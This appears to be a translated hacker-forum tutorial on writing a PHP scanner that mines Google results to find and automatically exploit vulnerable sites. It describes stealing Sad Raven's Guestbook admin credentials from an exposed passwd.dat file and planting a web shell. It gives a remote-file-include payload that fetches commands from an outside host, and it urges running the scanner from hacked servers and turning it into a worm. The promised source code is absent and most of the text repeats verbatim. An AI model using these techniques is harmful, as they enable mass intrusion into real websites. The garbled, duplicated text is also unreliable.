Hello, I want to tell you how you can make your own google scanner in php. I decided to write this article because I did not see anything like it on the net.
If anyone has seen anything similar, please let me know.
"Why php?" - You ask. Yes, because this script can
be uploaded to any hacked server and executed there. And in general, I believe
that the future is for php.
First, let's figure out what exactly we want to do.
1) from the search results (a basic script, for example), we need to tear out all the links
and write them to a file / display them on the screen (at least for debugging purposes);
2) then we need to qualitatively filter the left links - this, in my opinion,
is the most difficult;
3) then you need to go through each filtered link separately and
try to apply the exploit;
4) if it worked, then write it to the log.
As a script for my experiments, I took Sad Raven's Guestbook. I did not find any bugs in
the guest book itself, but the problem is that it stores the admin
login and md5 hash of the password in the "passwd.dat" file and quite often they
forget to deny access to it. And through the admin. center in the "design" section, you can make
yourself a simple web shell like this:
Well, let's get started =)
=======begin PhpGoogleScanner.php source code=======
=======end of PhpGoogleScanner.php source code======= An
exploit for scripts with an include bug could look like this:
buggy_script.php?page=http://www.evilcode.org/ c.txt?c=pwd;id;other_commands_here
Of course, this will only work if allow_url_fopen = 1.
You can also tweak the scanner to find and exploit sql-injection vulnerabilities.
And if you try hard, then by modifying this source you can make some kind of evil worm >=)
In general, you can think of a lot of other things, if only there is enough imagination and knowledge.
That's all for now, good luck.
If anyone has seen anything similar, please let me know.
"Why php?" - You ask. Yes, because this script can
be uploaded to any hacked server and executed there. And in general, I believe
that the future is for php.
First, let's figure out what exactly we want to do.
1) from the search results (a basic script, for example), we need to tear out all the links
and write them to a file / display them on the screen (at least for debugging purposes);
2) then we need to qualitatively filter the left links - this, in my opinion,
is the most difficult;
3) then you need to go through each filtered link separately and
try to apply the exploit;
4) if it worked, then write it to the log.
As a script for my experiments, I took Sad Raven's Guestbook. I did not find any bugs in
the guest book itself, but the problem is that it stores the admin
login and md5 hash of the password in the "passwd.dat" file and quite often they
forget to deny access to it. And through the admin. center in the "design" section, you can make
yourself a simple web shell like this:
Well, let's get started =)
=======begin PhpGoogleScanner.php source code=======
=======end of PhpGoogleScanner.php source code======= An
exploit for scripts with an include bug could look like this:
buggy_script.php?page=http://www.evilcode.org/ c.txt?c=pwd;id;other_commands_here
Of course, this will only work if allow_url_fopen = 1.
You can also tweak the scanner to find and exploit sql-injection vulnerabilities.
And if you try hard, then by modifying this source you can make some kind of evil worm >=)
In general, you can think of a lot of other things, if only there is enough imagination and knowledge.
That's all for now, good luck.